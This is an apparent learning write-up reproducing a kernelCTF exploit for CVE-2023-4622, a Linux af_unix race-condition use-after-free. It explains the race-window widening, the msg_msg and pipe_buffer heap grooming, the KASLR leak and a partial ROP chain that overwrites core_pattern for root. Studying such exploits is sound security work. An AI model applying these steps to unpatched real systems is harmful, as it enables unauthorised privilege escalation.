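KCTF CVE-2023-4622 Reproduction

A race-condition UAF in af_unix with a small race window. The kCTF exploit for it is a good way to learn the exploitation techniques for this class of bug.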

security-research/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md at master · google/security-research

Root Cause

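This is a race-condition bug: unix_gc races with unix_stream_sendpage. unix_stream_sendpage takes the tail element of the queue with skb_peek_tail without holding a lock, so the element can be freed by the racing path after it has been fetched, which results in a UAF.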

static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page,
				    int offset, size_t size, int flags)
{
	// ...
 
	skb = skb_peek_tail(&other->sk_receive_queue);
	if (tail && tail == skb) {
		skb = newskb;
	} else if (!skb || !unix_skb_scm_eq(skb, &scm)) {
		if (newskb) {
			skb = newskb;
		} else {
			tail = skb;
			goto alloc_skb;
		}
	} else if (newskb) {
		/* this is fast path, we don't necessarily need to
		 * call to kfree_skb even though with newskb == NULL
		 * this - does no harm
		 */
		consume_skb(newskb);
		newskb = NULL;
	}
 
	if (skb_append_pagefrags(skb, page, offset, size)) {
		tail = skb;
		goto alloc_skb;
	}
 
	// ...
}

Exploit

Triggering `unix_gc`

unix_gc exists mainly to handle reference-count cycles. See the article below for details.

Understanding Unix Garbage Collection and its Interaction with io_uring

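First set up Unix domain sockets that form a reference cycle, then close one of them; unix_gc will then free the elements in sk_receive_queue. (Because of the cycle, the reference count alone can never drop to zero, which is why a GC is needed.)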
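The setup described above can be sketched in user space as follows. This is a minimal illustration rather than the exploit's actual code: the helper names `send_fd` and `make_cycle_and_close` are hypothetical, and the cycle shown is the simplest one I know of (a socket whose own file descriptor sits in its own receive queue).

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: pass fd_to_send over the Unix socket `via`
 * as an SCM_RIGHTS control message. Returns 0 on success, -1 on error. */
static int send_fd(int via, int fd_to_send)
{
    char byte = 'x';
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align; /* forces correct alignment of buf */
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&msg, 0, sizeof(msg));
    memset(&ctrl, 0, sizeof(ctrl));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(via, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: build a self-referencing socket and drop the
 * user-space references to it. */
static int make_cycle_and_close(void)
{
    int sv[2];

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;

    /* Data sent on sv[0] is queued on sv[1], so the queued skb now
     * holds a reference to sv[1] itself: a one-node cycle. */
    if (send_fd(sv[0], sv[1]) < 0) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    close(sv[1]); /* the in-flight reference keeps the socket alive */
    close(sv[0]); /* releasing a Unix socket gives unix_gc a chance to run */
    return 0;
}
```

In the real exploit the final close would be issued from the thread that races against the splice call, so that unix_gc frees the queued skb at the right moment.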

Data Race

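Run two threads: one triggers unix_gc and the other runs sendpage, i.e. a splice operation. If the race is won, meaning unix_gc runs inside sendpage's vulnerable window, we get a UAF.

This UAF lets us write to a few bytes at the start of the freed object, which is enough to build overlapping objects. The object chosen here is msg_msg.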

Extending the Race Window

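The window here runs from skb_peek_tail to skb_append_pagefrags, which is only a handful of instructions. The time window is tiny, so we need a way to extend it.

timerfd can raise a hardirq at a specified time, with nanosecond granularity. If the timerfd fires inside the window, the CPU switches to the timer's interrupt handler, which stretches the window and gives unix_gc its chance.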

Project Zero: Racing against the clock — hitting a tiny kernel race window

When the timerfd hardirq fires, the kernel calls the handler timerfd_tmrproc. The handler wakes the waiting tasks through wake_up_locked_poll, which uses try_to_wake_up to set TASK_RUNNING or place the task on a runqueue.

To make the handler run longer, lengthen the wait queue. This can be done by having multiple epoll instances wait on the same timerfd at once.

To help illustrate the technique, here is a small example:

static int a, b;
 
static void race_a(void) {
  a += 1; 
  mdelay(1);
  b += 1;
}
 
static noinline int race_b(void) {
  int tmp_a = a, tmp_b = b;
  ndelay(10);
 
  if (tmp_a != a && tmp_b != b) {
    return 1;
  }
  return 0;
}

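How can race_b be made to return 1? A full run of race_a has to complete inside the ndelay(10) window. That window is small, so racing directly makes it very unlikely that race_a finishes in time. Instead, we can arm a timerfd in advance to schedule a timer interrupt: if the kernel happens to take the interrupt between reading the values and checking them, there is enough time for both a and b to be modified.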

Victim

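We first need to leak a kernel heap pointer, which is the frag shown below. Its off value is under our control and can be used to write two zero bytes.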

static inline void __skb_fill_page_desc_noacc(struct skb_shared_info *shinfo,
					      int i, struct page *page,
					      int off, int size)
{
	skb_frag_t *frag = &shinfo->frags[i];
 
	/*
	 * Propagate page pfmemalloc to the skb if we can. The problem is
	 * that not all callers have unique ownership of the page but rely
	 * on page_is_pfmemalloc doing the right thing(tm).
	 */
	frag->bv_page		  = page;
	frag->bv_offset		  = off;
	skb_frag_size_set(frag, size);
}

EntryBleed and Leaking Kernel Heap Base

Will’s Root: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

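(My understanding of this part is limited and these notes are rough; read the original article if you can.)

The address of entry_SYSCALL_64 is mapped in both the kernel and the user page tables, which makes a prefetch side-channel attack possible. In my tests on real hardware this did leak the heap address. I won't record the details here for now; that is a topic for a later post (:

With the heap base address known, we can spray a large number of objects in advance so that some address ranges hold the object we want with high probability. Pick one such high-probability address: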

#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg
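How the constant is combined with the leak can be sketched as below. This assumes that the leaked "heap base" is the base of the kernel direct map and that TARGET_PHYS_ADDR is an offset into it, as its name suggests; the helper `phys_to_directmap` and the example base address are illustrative, not taken from the exploit.

```c
#include <stdint.h>

#define TARGET_PHYS_ADDR 0x82e2380ULL /* value from the define above */

/* Hypothetical helper: address of a physical offset inside the direct
 * map, assuming direct_map_base is the leaked heap base. */
static uint64_t phys_to_directmap(uint64_t direct_map_base, uint64_t phys)
{
    return direct_map_base + phys;
}
```

For example, with a leaked base of 0xffff888000000000 the sprayed msg_msg would be expected at 0xffff8880082e2380.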

ROP

The technique mentioned in the exploit documentation is described in detail in the CVE-2021-22555 writeup.

security-research/pocs/linux/cve-2021-22555/writeup.md at master · google/security-research

Recall the msg_msg structure:

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

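We now have two overlapping msg_msg objects. Free one of them (the victim; otherwise the check does not pass), then spray messages of size 4096 - 0x30 + 0x80 - 8, each of which produces a 0x80-byte msg_msgseg, along with 1024-byte msg_msg objects. One msg_msgseg ends up overlapping the victim, so we can write a size of our choosing into it. The m_list.prev pointer is set to LIST_POISON2. (The reasoning is covered in the CVE-2021-22555 writeup. Note that the kernel must run without panic_on_warn and with CONFIG_BUG_ON_DATA_CORRUPTION disabled, otherwise it cannot get past this point.)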
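The size arithmetic can be checked with a small model of how a System V message is split into a msg_msg and its first msg_msgseg. This is a sketch that assumes 4096-byte pages, a 0x30-byte msg_msg header (matching the structure above) and an 8-byte msg_msgseg header; `struct msg_layout` and `layout_for` are hypothetical names.

```c
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u /* assumed page size */
#define MSG_HDR_SIZE    0x30u /* sizeof(struct msg_msg) */
#define SEG_HDR_SIZE    8u    /* sizeof(struct msg_msgseg): one next pointer */

struct msg_layout {
    size_t head_alloc; /* bytes allocated for msg_msg plus inline data */
    size_t seg_alloc;  /* bytes allocated for the first msg_msgseg, 0 if none */
};

/* Model the split of a message body of msgsz bytes. Only the first
 * segment is modelled, which is enough for sizes below two pages. */
static struct msg_layout layout_for(size_t msgsz)
{
    struct msg_layout l = { 0, 0 };
    size_t head_max = MODEL_PAGE_SIZE - MSG_HDR_SIZE;
    size_t seg_max = MODEL_PAGE_SIZE - SEG_HDR_SIZE;
    size_t inline_len = msgsz < head_max ? msgsz : head_max;
    size_t rest = msgsz - inline_len;

    l.head_alloc = MSG_HDR_SIZE + inline_len;
    if (rest > 0)
        l.seg_alloc = SEG_HDR_SIZE + (rest < seg_max ? rest : seg_max);
    return l;
}
```

With msgsz = 4096 - 0x30 + 0x80 - 8 the head fills exactly one page and the remaining 0x78 bytes land in a 0x80-byte msg_msgseg, while msgsz = 1024 - 0x30 yields a single 1024-byte msg_msg with no segment.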

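Because the victim's size has been modified, reading it now goes out of bounds. We use this to leak the contents of an adjacent msg_msg object. We free that adjacent object, call it victim2, reclaim its slot with a new msg_msg, and at the same time spray kmalloc-1024 messages so that the new msg_msg's m_list.next points into kmalloc-1024.

Reading the victim again now yields the pointer stored in the newly placed msg_msg. Then free that kmalloc-1024 object and allocate a pipe_buffer to take its place.

Next, replace the object at the victim's location with a new msg_msg, changing the size from 0x200 to 0x400 and pointing next at the pipe_buffer, then read the pipe_buffer's contents, including the anon_pipe_buf_ops pointer.

How do we free this pipe_buffer? The security field gives us an arbitrary free: put the pipe_buffer's address into the victim's security field and the whole buffer is freed.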

void security_msg_msg_free(struct msg_msg *msg)
{
	call_void_hook(msg_msg_free_security, msg);
	kfree(msg->security);
	msg->security = NULL;
}

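After that, spray msg_msgseg objects again and write the ROP chain into the msgseg.

As the last step, trigger one of the pipe_buffer's ops. Closing the pipe invokes release, which starts the ROP chain.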
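The trigger itself is ordinary pipe usage. A minimal sketch, assuming the pipe holds at least one populated buffer so that its ops pointer is consulted on teardown; `populate_and_release_pipe` is a hypothetical name, and on an unexploited kernel the call is harmless.

```c
#include <unistd.h>

/* Hypothetical helper: fill one pipe_buffer, then close both ends so
 * the kernel calls ops->release on the populated buffer. */
static int populate_and_release_pipe(void)
{
    int p[2];

    if (pipe(p) < 0)
        return -1;

    /* Writing one byte makes the first pipe_buffer slot live. */
    if (write(p[1], "A", 1) != 1) {
        close(p[0]);
        close(p[1]);
        return -1;
    }

    /* The pipe is torn down when the last end is closed, and release
     * is called for every buffer that still holds data. */
    close(p[0]);
    close(p[1]);
    return 0;
}
```

In the exploit the pipe is created and written to before the pipe_buffer array is overwritten, and only the two close calls happen at this final step.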

ROP Chain

static const struct pipe_buf_operations anon_pipe_buf_ops = {
	.release	= anon_pipe_buf_release,
	.try_steal	= anon_pipe_buf_try_steal,
	.get		= generic_pipe_buf_get,
};
 
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
				  struct pipe_buffer *buf);

A classic stack pivot followed by ROP. Some of the gadgets used:

push rsi ; jmp qword ptr [rsi + 0x2e]
pop rsp ; pop r15 ; ret
pop rdi ; ret
pop rsp ; ret

Execution then continues at pipe_buffer + 0x50:

	ROP(i++) = POP_RDI;
	ROP(i++) = CORE_PATTERN;
	ROP(i++) = POP_RSI2;
	ROP(i++) = (size_t)&user_buf;
	ROP(i++) = POP_RDX;
	ROP(i++) = sizeof(user_buf);
	ROP(i++) = COPY_FROM_USER;
	// msleep(0x10000);
	ROP(i++) = POP_RDI;
	ROP(i++) = 0x10000;
	ROP(i++) = MSLEEP;

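Below is a screenshot of the run. (I couldn't be bothered to find the gadgets 😭; when I have time I'll look at other exploitation methods such as pagejack.)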
